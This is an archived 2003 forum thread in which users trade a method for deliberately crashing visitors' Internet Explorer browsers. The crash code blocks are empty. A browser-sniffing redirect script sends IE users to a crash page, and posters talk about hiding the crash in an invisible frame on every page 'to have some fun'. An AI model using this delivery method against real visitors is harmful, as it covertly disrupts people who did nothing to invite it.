All Things Microsoft > Microsoft Software
Crash IE..
M51DPS:
quote:
--- Code: ---
--- End code ---
Notice that it's only the <input> tag and the 'type' attribute that cause the crash. Take it and do what you wish with it. After all, it might take M$ another 7 years before they magically 'patch' this one as well. :D
--- End quote ---
I know the code to make it crash, i meant what ecsyle was talking about. Or maybe instead of redirecting someone I should make a tiny invisible frame that every page has.
[ May 03, 2003: Message edited by: M51DPS ]
Pantso:
quote:I know the code to make it crash, i meant what ecsyle was talking about. Or maybe instead of redirecting someone I should make a tiny invisible frame that every page has.
--- End quote ---
You didn't hear that from me.. :D
[ May 03, 2003: Message edited by: Panos ]
zoolooo:
This is the bit you need - replace the bold stuff with yours.
quote:<html>
<head>
<meta http-equiv="refresh" content="1;
URL=http://http://www.domain.com/realhomepage.html">
</head>
<body>
<script language="javascript">
<!--
if (navigator.appName == "Microsoft Internet Explorer") {
document.location = "http://www.domain.com/ie_crash.html";
} else {
document.location = "http://www.domain.com/realhomepage.html";
}
// -->
</script>
</body>
</html>
--- End quote ---
zooloo
M51DPS:
Thanks everyone, now to go have some fun ;) .
EDIT: I just did some testing, works perfectly. To avoid making a seperate home page I modified the code slightly so that I could put it in every page. Here's what I got:
--- Code: ---
--- End code ---
[ May 04, 2003: Message edited by: M51DPS ]
Navigation
[0] Message Index
[*] Previous page
Go to full version